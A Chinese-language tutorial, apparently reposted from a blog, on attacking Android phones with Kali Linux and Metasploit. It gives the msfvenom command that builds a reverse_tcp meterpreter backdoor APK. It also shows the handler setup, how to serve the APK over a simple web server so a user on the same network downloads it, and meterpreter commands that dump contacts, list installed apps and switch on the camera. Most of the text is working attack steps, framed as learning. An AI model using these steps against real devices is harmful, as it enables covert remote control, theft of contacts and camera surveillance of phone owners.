利用Kali攻擊Android手機


一、Metasploit及其監聽模塊介紹

 

 Metasploit是一個免費的、可下載的框架,通過可以容易地地獲取、開發並對計算機軟件漏洞實施攻擊。它本身附帶數千個已知軟件漏洞的專業漏洞攻擊工具。

輔助模塊(auxiliary)進行信息收集,執行掃描的功能。
滲透攻擊模塊(exploit)用於實際進行滲透攻擊,得到一定的權限
攻擊載荷模塊(payload)把權限持久化,目標系統被成功滲透后執行的代碼
后滲透攻擊模塊(post)進一步滲透測試:提權

handler 監聽后門模塊

   use exploit/multi/handler
(使用handler監聽模塊)

(設置攻擊載荷模塊)
set payload android/meterpreter/reverse_tcp

二、手機端滲透原理

利用msfvenom生成apk木馬,攻擊者通過鏈接給用戶通過下載木馬程序下載到手機端,前提在同一局域網下。當用戶點擊下載的木馬程序,攻擊者就可以通過木馬遠程控制對方含有木馬的安卓手機端。
三、制作惡意軟件並獲取shell權限

生成android后門

msfvenom -p android/meterpreter/reverse_tcp lhost=本地IP lport=4444 > shell.apk

 

開啟並使用msf中監聽

 

 

 
* use exploit/multi/handler


* set payload android/meterpreter/reverse_tcp

* set lhost 本地ip
* set lport 4444
* run

下載apk

在kali中apk后門所在目錄開啟web服務:python -m SimpleHTTPServer

 

在安卓瀏覽器里訪問網址下載apk

 

 

 

 

 

 

 

 



四、實戰:遠程控制

成功拿到msf中會建立會話,分別通過

執行命令
sysinfo  查看系統信息


app_list  查看安裝app文件

 

 


check_root  檢測系統root
dump_contacts 下載通訊錄信息


webcam_list 獲取攝像頭信息


webcam_stream  開啟攝像頭

 

成功調用安卓攝像頭。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM